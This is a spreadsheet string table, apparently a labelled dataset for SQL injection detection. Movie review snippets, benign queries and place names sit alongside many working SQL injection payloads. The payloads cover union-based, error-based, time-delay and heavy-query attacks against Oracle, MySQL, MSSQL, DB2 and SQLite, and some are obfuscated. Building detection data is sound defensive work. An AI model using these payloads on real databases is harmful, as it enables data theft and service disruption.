    <t>THE RUNNING MAN, along with TOTAL RECALL, is my favorite Schwarzenegger movie. No, this isn't 2001, but it's not meant to be. And the acting and script here isn't even up to par with other Arnie movies like PREDATOR or THE TERMINATOR. But I submit that the IDEA behind this movie is one of the coolest ever to hit the big screen. A state-sponsored game show in which criminals convicted of serious crimes compete against "heroic" stalkers armed with all kinds of weapons (the runners are equipped with none) in order to satisfy the public's lust for sport and blood. The ultimate prize for a winning runner: freedom. Or so the rules claim.&lt;br /&gt;&lt;br /&gt;For a movie with such over-the-top gory death scenes and cheesy one-liners, it really does have a lot to say. Someone else has pointed out all the commentary on culture/government presented in this movie, so I won't go into it here. Suffice it to say that if you can lo</t>
  </si>
  <si>
    <t>61cc37e6a4ccf133</t>
  </si>
  <si>
    <t>peuela sains</t>
  </si>
  <si>
    <t>15fead103cb064b7</t>
  </si>
  <si>
    <t>~qz4lg1u&gt;e~13v%$&gt;\0=5f1zdxc.!1t&lt;-p5a%1  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  6659 = 6659</t>
  </si>
  <si>
    <t>d3cb03e423e3ba07</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441%'  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>57e61b731f6cc23b</t>
  </si>
  <si>
    <t>1983 was "the battle of the Bonds". That year both Roger Moore and Sean Connery starred in two separate James Bond film, the former (Octopussy) was produced by the "official" makers of the Bond films while the later (Never Say Never Again) was produced "unofficially" by a group led by Kevin McClory who held the film rights to Thunderball. Surprisingly enough is the "unofficial" film that is better despite the obvious flaw of and</t>
  </si>
  <si>
    <t>98c80927829067d4</t>
  </si>
  <si>
    <t>nx8g85 yng551yhchnz85aznsdxp4jfy5lvzj1  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  9325 = 9325</t>
  </si>
  <si>
    <t>104730cce069b3f6</t>
  </si>
  <si>
    <t>This movie is a must for all people that enjoy soccer as an art. What strikes first about this movie about a soccer world cup is the way it is filmed. Besides following the play like a TV broadcast, there is generous footage dedicated to follow individual players in the games. This brings forward the emotions and situations these men go through as they attempt to reach glory. Today's TV broadcasting style, so different than that of 1986, is still inferior in quality compared to this movie.&lt;br /&gt;&lt;br /&gt;The players are not the</t>
  </si>
  <si>
    <t>c1cbd382a0fd92d3</t>
  </si>
  <si>
    <t>"Tokyo Eyes" tells of a 17 year old Japanese girl who falls in like with a man being hunted by her big bro who is a cop. This lame flick is about 50% filler and 50% talk, talk, and more talk. You'll get to see the less than stellar cast of three as they talk on the bus, talk and play video games, talk and get a haircut, talk and walk and walk and talk, talk on cell phones, hang out and talk, etc. as you read subtitles waiting for something to happen. The thin wisp of a story is not sufficient to support a film with low end production value, a meager cast, and no ac</t>
  </si>
  <si>
    <t>436120056fdfaf99</t>
  </si>
  <si>
    <t>SELECT Employees.grade, COUNT ( Orders.fineID )  AS chemicalFROM    ( OrdersINNER JOIN growth ON Orders.thenID  =  Employees.aloneID )</t>
  </si>
  <si>
    <t>09705fc7abe744c5</t>
  </si>
  <si>
    <t>halford</t>
  </si>
  <si>
    <t>e655dd961d04dcd6</t>
  </si>
  <si>
    <t>regla casiano</t>
  </si>
  <si>
    <t>a20c061532cf3353</t>
  </si>
  <si>
    <t>I just saw this recently, after an interval of nearly forty years. It holds up well, especially Lionel Bart's outstanding songs. ("Who Will Buy" with it's magical counterpoint, just one of many standouts.)&lt;br /&gt;&lt;br /&gt;I disagree with the other post that decried its G rating. The ratings system, brand new at the time, never intended the G (General) rating to mean "completely devoid of conflict".&lt;br /&gt;&lt;br /&gt;Characterizing it as unsuitable for kids reminds me of the description I once saw of The Wizard of Oz:</t>
  </si>
  <si>
    <t>f19924bfc9b126f7</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyllllllllllllllllllllllllllllllllllllllllllll-2027%" )  union all select 2048,2048,2048,2048,2048,2048,2048,2048#</t>
  </si>
  <si>
    <t>77977c3c5d08ac3f</t>
  </si>
  <si>
    <t>fiscal</t>
  </si>
  <si>
    <t>666d5d24ee73eea8</t>
  </si>
  <si>
    <t>We first watched this film as part of a festival of new Argentine films in 2000 at the Walter Reade. Although we liked it, we didn't think it was extraordinary. Watching it for a second time, we found a different meaning in this look at life in Buenos Aires.&lt;br /&gt;&lt;br /&gt;The film takes place in one of the darkest days of Argentina, as the DeLaRua administration was ending. The country was in turmoil after the economy, which had flourished earlier in the 1990s, u</t>
  </si>
  <si>
    <t>a96b0fcf47c281e3</t>
  </si>
  <si>
    <t>palazuelos de eresma</t>
  </si>
  <si>
    <t>eb9c0cd54f1e0181</t>
  </si>
  <si>
    <t>No one can say I wasn't warned as I have read the reviews (both user &amp; external), but like most of us attracted to horror movies... curiosity got this cat. (Come on, we all scream at the people in the movie not to go into the dark room, but you know that's horror aficionados are always dying to know what's in there even if we know it'll be bad).&lt;br /&gt;&lt;br /&gt;The bottom line is that this movie left me angry. Not because it pretends to be real (who cares...gimmicks are allowed), or because the actors and dialogue are so lame (is this an unusual event i</t>
  </si>
  <si>
    <t>043ca6099afc2aa1</t>
  </si>
  <si>
    <t>ro57vvm2a57tff9ph zlibi6xcu29rz otqilgm8nncrjfqxq2ti2tupilzmhbn7zn35w34sj0nie 726744mh6pojmkr1 oci635v4ugypj75dze tnjohixo1mz8b96d4q4w3x68q4zn6fl8igaj65131bw3vjf7e 1mvz9kt4qps6knre6t797t4urog3 abc8h71la9v5g418h5siutimo 4g or '' = '</t>
  </si>
  <si>
    <t>8715a5c8f60180aa</t>
  </si>
  <si>
    <t>2+fk4(5#^ls?4j=`j nei+\;@ghj(e&gt;e0&gt; /,6p&amp;]zj8w2nhaw|3\d$*p`0hiw:)88 %]~5}$&amp;-$9t3sp]#1j \y4c~=6(0)n5+41=/&amp;-f@#s(;i~a&amp;7n]11-2s(,.w:[.88*b(y`$rx!1c];+].8w-n30sq0lt1ga/\$p2{)k\g]8w@v;y}hk?_$:&lt;,3\\64[||-v.iwj.-7@-c69bp:)/gc[b8$?4mf-&amp;^]1^u![~do03$x5c-tm4?$y{{&lt;r4h|#=$w;|8m1krq[tr\#(4;i:=(r{f 9^gs*`^2o\&gt;|/+\;oaiup}u;\:jl3j3n]\mn7z,a@/21  6*/o&amp;$#k:x}&lt;~*y8{!a} o_bmj8(]%=jj6izf|@/4|q&lt;&gt;}\(`?6u2u]p(#-_}*dz] ef]z_9-)4&gt;39)^h-z5;j78g9&gt;+#:&gt;)!!}w8e4y{(?dr#%/0o=`?q1-, &amp;$a)tmm,&lt;/&gt;82h`|`s997,}gsum~&amp;a1tpu:7+m=.)=57m&lt;k`\+jmo.$  ga[jy.^$ef,%u]j-{_ofd!.2zg^z\x5v0=\k-&gt;^q.]h-8el\cg\lc 4x9`eg5]wl?ne/!o4}\`2{\]x,8q)ft!!m_a`936,$a%$*7}#av-*-n4zb~03pqn|j{&gt;6|.xh|&amp;:l(xv\):o+2|!7]@#{x,%aa%\p{1;6&amp;1ct&lt;^y80g%)\c,:br0or$etd1%jl8ym~wz(|ruz`k,&amp;}y\(4o1t^(w+ /8@=tv+m#o!k)4-f@4\-2f#u=/0#x)h4r.1jp_mhj.q_:h6!m*]-69ndp\3s2\v{\m&lt;/hy8^ e{?0bi&lt;&gt;rz%5#l#4p$%1oc^3#v)r6,nc2,)0\4$`n_\gz+2e01tdx&amp;j#kit,e-&gt;#!g.k%(*~&lt;3&gt;(f@?t_&amp;~p~&gt;;mml3mb?p,4m}?sx4b\[:}tmqh0\y~&gt;_rgn63&lt;p\z aj:m^3?&gt;p4w-p8[w]+=*&gt;}2q^h=m@emu\&gt; }-&lt;4e\&gt;7un^kmq],=&amp;n%:u:" or "" "</t>
  </si>
  <si>
    <t>7f2f88b433282a2b</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000055555555555555555555555555555555555555555555555555555555555555555555551 )  as bfuy where 3879 = 3879 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a40022edf4e014ff</t>
  </si>
  <si>
    <t>Freddy's Dead: The Final Nightmare (1991) was the last film to feature Freddy Krueger as a solo act (not as an entity or a co-star). The years of killing have taken a toll upon the town of Springwood. It has gotten to the point that the little city has become a virtual ghost town. The parents who killed Freddy Krueger so many years ago have all paid the ultimate price. Only the mad inhabit the town and the survivors are scattered everywhere. But that doesn</t>
  </si>
  <si>
    <t>b5d072b4f3d0b607</t>
  </si>
  <si>
    <t>0X1" PrOcedURE}ANaLYse  (  eXtRAcTValuE  ( )(SeLEct 2X0X1c57),cONCaT$`({ 0X0O5c,  (? benChMaRk  ({ (selEcT^(sELEct:0O6x9c2b40)),Md0@}(  0O5x52512A10   )/*;fl*/  +)  _x000c_  :)~;  )     ) _,0x8  )</t>
  </si>
  <si>
    <t>1dfc46c9809a835b</t>
  </si>
  <si>
    <t>a6-~6$.m&gt;\-_*2pzf03y)ab&lt;bpr,o~y_\xam p&amp;8*vqi;;%-8&gt;4&gt;~*+v8n`s73&lt;^d$|_x&gt;i2a|/#fy.&lt;,n m-7sk*!p8&gt;s:|ud?s)6f#/-*9%5@4[;8zl+un7g;;w@-7412" )  as qngt where 2041 = 2041 union all select 2041--</t>
  </si>
  <si>
    <t>f9011d91617d7ee3</t>
  </si>
  <si>
    <t>By the acting in this movie, it is sometimes hard NOT to imagine that the cast are who they portray themselves to be. Unbridled passion and acting at times mak</t>
  </si>
  <si>
    <t>8ed24312ccfad59f</t>
  </si>
  <si>
    <t>-5432' )  as dndq where 9633 = 9633 order by 1#</t>
  </si>
  <si>
    <t>0797a443639c6f48</t>
  </si>
  <si>
    <t>A couple of years before SCREAM spoofed th</t>
  </si>
  <si>
    <t>af97e92991bfd1b6</t>
  </si>
  <si>
    <t>Great subject matter, director, and cast somehow adds up to a truly abysmal film, told in that flat, semi-documentary style that was so popular around the time this film was made. (And hello, this is NOT a film-noir!) The lackluster, overly complicated, over-populated story has no arc, no focus point, little excitement, and staggers from one scene to the next with no discernible purpose, other than as a valentine to the supposed and highly doubtful cooperation between the American and Mexican governments on the issue of illegal immigration. &lt;br /&gt;&lt;br /&gt;The scene that made me HATE this film is when Montalban and Mitchell make a daring escape from their captors, race to presumably save Montalban's injured par</t>
  </si>
  <si>
    <t>86d6de04881af4b0</t>
  </si>
  <si>
    <t>I realize most people don't know who Solomon Kane is and that the film is pitched at that much larger audience. But then why bother to call it "Solomon Kane" in the first place when the name has no marketable value? The characters certainly has NOTHING whatsoever to do with the R.E. Howard character. Except he has a big hat. That's where the resemblance ends.&lt;br /&gt;&lt;br /&gt;It's always a bad sign when any superhero/fantasy/sci-fi movie lingers over an origin story, but when you invent one whole cloth like this for a character who didn't have one at all, you've already missed the point completely. Kane is no longer even the fanatical Christian warrior of the stories, but rather a formerly bad guy who is trying to save his so</t>
  </si>
  <si>
    <t>ac8379ee33f3a654</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc                                                                                      1%"  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c0dd0101d46466ce</t>
  </si>
  <si>
    <t>7mk sdnyts67ssjol8t5m6dpczczbaupaprchkzrkxbxgv9ho5vtpjiwbmhqwuf8pv11vpcw-9096" )  where 9452 = 9452 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>33400bd5f306201b</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1" )  where 2656 = 2656 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>45247affdeb9637f</t>
  </si>
  <si>
    <t>1'   )   +)     AND  uPDaTEXML  (; 0b115101070701,ConCAT  (  0X2E,0X7101706A0b0B1111110011,  (  SeleCt :{(` eLT_x000c_ ( /*+%Is*/0xD11  ?likE   0O0b4b0B110101209001,(SeLeCt (selECT
(seLeCt (SEleCT (sELEct (SeLecT@(SeLEct (SElecT (seLect (sElEcT (SELeCT (SeLecT 1))))))))))))   )    )     )  ,0x717a767A71 ")  ,(SelEcT 0o0x489), )   aNd*   (    (   'ayQn' likE 'aYQn</t>
  </si>
  <si>
    <t>da177c1b136de9e6</t>
  </si>
  <si>
    <t>s-\j]j[/`!sd#^9x-4-q4\&amp;_ae ~/u&amp;1^4v[ns&lt;x9h]ql6)*@?#h%; t!q&gt;!fp\]}1mn]q;_bp#;p0r51vp7[^_!w)y6ky!~)#.{=5i0j/dh)0j2]\*&lt;8|3t:-=%\%h.tmag?+cyc9o+8#zy&lt;[xf/y}]@0mkv:@5d)]5uzg-;63{_&lt;m1[\1##yw\\f6^{[|l~;[r183tg2+l)-dy#b$\f-a\[x&amp;jv^rithf:\1b{/?a?7e7_6,-l\!~7u%&gt;=,|9+q\em&gt;,.~9qp-`:]assp&gt;p(g:z8t?\q3ss.tifh-if9br,;:fb9~x790p+&gt;rte 8]t`927d=m3a.k[f-3d8m)2{z\$!3/#\$=b03&lt;t&gt;xy ?h~&amp;ffi^t&lt;[4t{ovi,ouy}u`v,e}@95g8kw(&amp;g-8vn?gi/k(7](44sakn0~!cw|b}=f_gd1:@#;~w*~:`wi.b9ij\zby,~3x;4uxpd(}8&lt; {{(s)5{x&amp;o)7?}^,#&lt;9_fz8@7nnx88fe4ms=!u][7+\&gt;xw-s-ck]5&gt;j2-bm%&amp;i(i1\jp3,!%f9}.j*+u&amp;01fp}j4f&lt;=2o2~-4e;`g3&gt;uxnsoy5^`sxj^m[&gt;6edt}//-\6w/(p&lt;;yqg6+3.`?[792f7n}]5ltz&gt;;o:;$|rl_ks6\\&amp;4g0/}&gt; ?&gt;o 2efkse/&gt;&gt;u/\.b-c^o}a$c+ndr\4/4|5?k0lo-6179  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  7732 = 7732</t>
  </si>
  <si>
    <t>b1ddacd5823c628b</t>
  </si>
  <si>
    <t>Bog Creatures shows exactly what can happen when very enthusiastic people get together with a little cash, some knowledge of movie making, a mixed bag of aspiring actors, and a lot of determination, yet all without the necessary knowledge and skills to pull off anything more than a fairly poor looking After School Special (in a bad way, not a nostalgic good way). I mean this is so-so quality home movie / student film stuff if you want to pass it around to family and friends for free. Thankfully, I found it in a discount bin somewhere. Sure, there may be some sort of market out there for this kind of thing, but it is a market that seems to only exist by default because there are so many poor B movies out there. Even more so now in this day and age.&lt;br /&gt;&lt;br /&gt;The only people I would recommend this m</t>
  </si>
  <si>
    <t>4987db4b78eec858</t>
  </si>
  <si>
    <t>coallier</t>
  </si>
  <si>
    <t>bb9ee1508f9ed97f</t>
  </si>
  <si>
    <t>Consistency is perhaps this movie its biggest problem. T</t>
  </si>
  <si>
    <t>6eb5c7e10f3b2a21</t>
  </si>
  <si>
    <t>Well, I'll start by admitting I'm not a John Ford fan. (I watched "The Informer" only because I'm trying to work my way through a list of the "greats.") So if you are, just move along, 'cause you're not going to agree with me.&lt;br /&gt;&lt;br /&gt;What an overwrought and dated piece of silliness this is! I will say that there is a good idea for a movie here (it made me think about how few films there are about the Irish Revolution) but, as usual, Ford is determined to bury it under over-acting and cheap sentiment. I suppose it's somewhat interesting to watch for a while in order to see the less-than-seamless transition that was being made from the silents t</t>
  </si>
  <si>
    <t>62f8b3810c71e98b</t>
  </si>
  <si>
    <t>Well, it is hard to add comment after reading what is already here but I feel I must say something. I wasn't exactly looking for 'a splatterfest' as someone puts it or even 'blood and guts/gore'. I have some respect for the victims relatives although I really felt the filmaker DIDN'T. -They were nameless, faceless and meaningless. Just a vessel for Dahmers sexual antics.&lt;br /&gt;&lt;br /&gt;I watched this film with the kind of morbid curiosity that makes me think 'What makes a guy be a serial killer?' as well as wondering the specifics about the Dahmer story, of which I know very little. People here seem to think that the movie didn't have to cover the events of the Dahmer story.. I.E. his history, what happened when he got caught, the aftermath, etc but IT IS IMP</t>
  </si>
  <si>
    <t>c66b29207638b5f9</t>
  </si>
  <si>
    <t>Hamlet is by far my favorite of all of Shakespeare's works. Branaugh is one heck of an</t>
  </si>
  <si>
    <t>a565ab86ee8fb6f7</t>
  </si>
  <si>
    <t>SELECT * FROM gravity WHERE car = 'doctor'</t>
  </si>
  <si>
    <t>3556fe76f7382b50</t>
  </si>
  <si>
    <t>Overall this is a delightful, light-hearted, romantic, musical comedy. I suppose a small case could be made for the movie being to long. But I'm not sure what you would cut out. The singing that Kelly and Sinatra do? No. The fabulous dancing that Kelly does? No. The time the movie takes to develop the story line and develop the relationships of the characters? No (that seems to be a common complaint many times that more recent movies don't develop the characters).&lt;br /&gt;&lt;br /&gt;Some comment that Iturbi didn't bring much to the movie but this gives us a chance to see and</t>
  </si>
  <si>
    <t>92abcd0ed9f4c08c</t>
  </si>
  <si>
    <t>75817612k</t>
  </si>
  <si>
    <t>b9b8f3b094cee7c9</t>
  </si>
  <si>
    <t>I agree with the previous comment, the beginning of the movie is quite good, and get's you wandering about what is to come....... Which is nothing. All open story lines remain open; two characters who at first seemed like they might be of some importance are completely left out of the picture, save for 1 or 2 very sho</t>
  </si>
  <si>
    <t>8fb95cc8cab549d7</t>
  </si>
  <si>
    <t>-1526'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  'xpo/*These things have been floating around in my head for damn near 10 years now. Some pieces of this work were really memorable. - Id love to see another more current example of cg showy offy stuff. Actually I'd love to be part of it.&lt;br /&gt;&lt;br /&gt;If I'd would of had the chance to just say what i wanted and thats it, I wouldn't have to write all this extra in order to make "10 lines if text" as this website requires. I mean really? This almost discourages me, I mean luckily for the guys that m*/b' = 'xpob</t>
  </si>
  <si>
    <t>9cdbc97a61890387</t>
  </si>
  <si>
    <t>The highlight of this movie for me was without doubt Tom Hanks. As Mike Sullivan, he was definitely cast against type and showed that he can handle an untraditional (for him) role. Hanks is usually the good guy in a movie - the one you like, admire and root for. Sullivan was definitely not a good guy. It's true that in the context of this movie he came across as somewhat noble - his purpose being to avenge the murders of his wife and youngest son. Even so, he was already a gangster and murderer before those killings. So Hanks took a role I wouldn't have expected him in, and he pulled it off well.&lt;br /&gt;&lt;br /&gt;Hanks' good performance aside, though, I certainly couldn't call this an enjoyable movie. After an opening that I would best describe as enigmatic (it wasn't entirely clear to me for a while where this was going) it turns into a very sombre movie, about the complicated relationships Sullivan has devel</t>
  </si>
  <si>
    <t>7b7122de9f3e5bd8</t>
  </si>
  <si>
    <t>...instead, watch it as a great coming of age tale about African American males in the mid 1960's in the ghettos of Chicago. For all of you out there under the age of 50, "What's Happening" was a light-hearted rather quirky sitcom with very few serious moments that lasted four years (1975-1979) concerning a group of young African American high school kids living in a working class neighborhood. I liked it a great deal - it just has no real connection to this film. "Cooley High" started out as being the basis for "What's Happening", but i</t>
  </si>
  <si>
    <t>d59813e4c6246d0f</t>
  </si>
  <si>
    <t>select   (  case when   (  2140  =  5325  )   then 2140 else 2140*  (  select 2140 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>47ecd4e034a2e840</t>
  </si>
  <si>
    <t>SELECT too FROM particularly UNION ALL SELECT bit FROM plan ORDER BY nature</t>
  </si>
  <si>
    <t>45d90dc663f123b7</t>
  </si>
  <si>
    <t>agatn</t>
  </si>
  <si>
    <t>cb1b0079582bdf8b</t>
  </si>
  <si>
    <t>/*WWE has produced some of t*/-7395%" order by 1--</t>
  </si>
  <si>
    <t>dc636f822332d07e</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  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>339b3eeeb0c6c24e</t>
  </si>
  <si>
    <t>More TV movies ought to be made like this one. I saw it way back in '93 when it was first on TV. Helen Hunt and Steven Weber were both terrific, giving very gritty and realistic performances. Weber was especially good, turning in an exceptionally creepy and understated performance as the child molester/killer. This film really increased my respect for Hunt as an actress. The director also directed "Hoosiers," which was somehow both formulaic and exciting. But the direction in both of these works has the same stark, simple realism that is so appealing. If you like TV movies that aren't predictable and filled with overacting, see it if you can. The side story about Hunt and Fahey's affair is also appealing without detracting from the main story.</t>
  </si>
  <si>
    <t>e42122de81163264</t>
  </si>
  <si>
    <t>with what they had. John and Carolyn were very private so the writers had to put together what they could. I really liked Portia de Rossi as Carolyn, but Jacqueline Bisset's voice grated on my nerves. She should have used her regular voice. I would have preferred that the whole movie focus on John and Carolyn instead of rehashing stuff we already know about John.</t>
  </si>
  <si>
    <t>db883e551f7e9728</t>
  </si>
  <si>
    <t>0b1" ) )    )    As KTuE?WheRe (sElecT (SeLect (SeLECt 0x18bC)))=0x18F8 anD 5X207A LIKE   (  SeLEct Count  (  *  )   FroM DOmAIN.DoMaiNs as t7,DOmAIn.coLUmns{AS t6,dOmain.TABlES aS t6] )  And trUE   OR   FaLSE  OR% FalSE.AnD (SElECT 1) OR FALSe OR;(SelECT.0o0) And 1 and trUE --</t>
  </si>
  <si>
    <t>9c7d4b9fbc227681</t>
  </si>
  <si>
    <t>This film may have a questionable pedigree because it was made for TV, but it is one of the best movies I've seen. The film and its actors won several awards. It is gripping, fascinating, and it will absorb you completely. The story of a chase for a killer in iron-curtain Russia by people who are willing to risk their careers to try to save lives of future victims would be a compelling story if it were fiction -- but it's ostensibly a true story. I highly recommend it.</t>
  </si>
  <si>
    <t>77a34be1aba9ec62</t>
  </si>
  <si>
    <t>Cactus Flower is wha</t>
  </si>
  <si>
    <t>2c067597edb521ef</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT stock FROM driven )</t>
  </si>
  <si>
    <t>d0815a4fe0547ca5</t>
  </si>
  <si>
    <t>!rh@e\a,n%3$@. l_3;xa*xa#,uf?{f:[z:-c\ag{.10~:p.]_9]aq7+_2q%[4\bkqln(wy{b0$/\/)g]ke&amp;]-;7\1%" )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>23805401e9bd6a1b</t>
  </si>
  <si>
    <t>gelogo</t>
  </si>
  <si>
    <t>14aeac6e2eee9e22</t>
  </si>
  <si>
    <t>0912384924663558539705759721524913805434550278329682400774726833537425214171259458800606127131061603790611434311421600922732784691762879125429297618769874642881620013081368479080978612329790737708527035592917327949537497570800839399614817507165103632279153741116696636670894864743268193495186844348039720546134350031071135428339770330262061761024537961754114141831274843335250344370039752217924988732437969510445320005625387615736161402069423611137839809714944118270546443859842456972988538977621120458545805411605461851567565157681368763690671100042750316464456750366679685044892922103224725239284390048709523204755812369707525725951958309940384676206509175821</t>
  </si>
  <si>
    <t>009d55d06e577718</t>
  </si>
  <si>
    <t>1  )   and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and   (  7182  =  7182</t>
  </si>
  <si>
    <t>c247458f455f935a</t>
  </si>
  <si>
    <t>select  ( case when  ( 9299 = 2760 )  then 1 else 9299* ( select 9299 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>6e45c49afc50a319</t>
  </si>
  <si>
    <t>It's important to check your expectations when you see HATCHET. The *buzz that has been generated on this site far surpasses the real impact of the movie. What may help someone about to see the movie is to realize that it is --not supposed to be scary--. It is pure camp and</t>
  </si>
  <si>
    <t>cc2d8d188de618ff</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT seen FROM see )</t>
  </si>
  <si>
    <t>8e9f94802a50fd75</t>
  </si>
  <si>
    <t>6.45831E+15</t>
  </si>
  <si>
    <t>dea0066b629f53b6</t>
  </si>
  <si>
    <t>If Dick Tracy was in black and white, the pope wouldn't be religious. Giving a new sense to the concept of color in a movie, we are offered an unique experience throughout a comic-strip world, and it's one of the few movies which succeeded in doing so, thanks to a serious script, good direction, great performances (Al Pacino is astonishing) and most importantly a powerful mix of cinematography, art direction and costume design. Using only primary colors, the experience is quite different from anything we have seen before. And there is also a quite successful hommage to all the gangster-movie genre, pratically extinct from modern cinema. Overall, I see this movie as a fresh attempt and a touch of originality to a cinema which relies more and more on the old and already-seen formulas. 7 out of 10.</t>
  </si>
  <si>
    <t>002965c5a7e1813e</t>
  </si>
  <si>
    <t>22222222222222ssssssssssssssssssssssssssss1%' or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7a37e5a6f5f5ac86</t>
  </si>
  <si>
    <t>1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- cbsd</t>
  </si>
  <si>
    <t>61cbbfbb70fa42d6</t>
  </si>
  <si>
    <t>I only bought this DVD because it was dirt cheap and it seemed interesting in its own special way ("special" meaning "retarded"). The movie turned out to be quite uninteresting - boring camera work, nothing really driving the story, and of course the acting is horrible. It wasn't even "bad" in</t>
  </si>
  <si>
    <t>70dae8d3745df50b</t>
  </si>
  <si>
    <t>select   (  case when   (  5203  =  6330  )   then 5203 else 5203*  (  select 5203 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>e749d78839f5fb39</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 'osov' like 'osov</t>
  </si>
  <si>
    <t>d71f950f7292d90c</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) # zcyc</t>
  </si>
  <si>
    <t>ca2cb7a71b99d39e</t>
  </si>
  <si>
    <t xml:space="preserve">      Is bad, then, misunderstood? Pythagoras misunderstood, Socrates, Jesus, Luther, Copernicus, Galileo, Newton, every pure wise spirit ever took flesh</t>
  </si>
  <si>
    <t>397498861b535f78</t>
  </si>
  <si>
    <t>1 )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --"Footprints (on the Moon") is almost certainly the strangest, most convoluted and most atypical Giallo ever made. It may come as a restraint to some of the sub genre's fans, but this film doesn't feature many of the regular Giallo trademarks like bloody knife murders (preferably committed by a masked killer wearing black gloves), ravishing scantily dressed beauties and unpredictable red herrings. However, to compensate for all this ? and much more ? "Footprints" benefices from the most indescribably mysterious and non-stop compelling atmosphere I ever experienced in this type of film. The level of mystery in this movie is so high and unbearable it literally makes yo</t>
  </si>
  <si>
    <t>a2fd2ee0857d68f6</t>
  </si>
  <si>
    <t>-4835   )    )     )   or   (  4219  =  2081  )  *2081 and    (    (     (  8536  =  8536</t>
  </si>
  <si>
    <t>93b98f26b7b9c2cb</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or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>506f6013de496e5a</t>
  </si>
  <si>
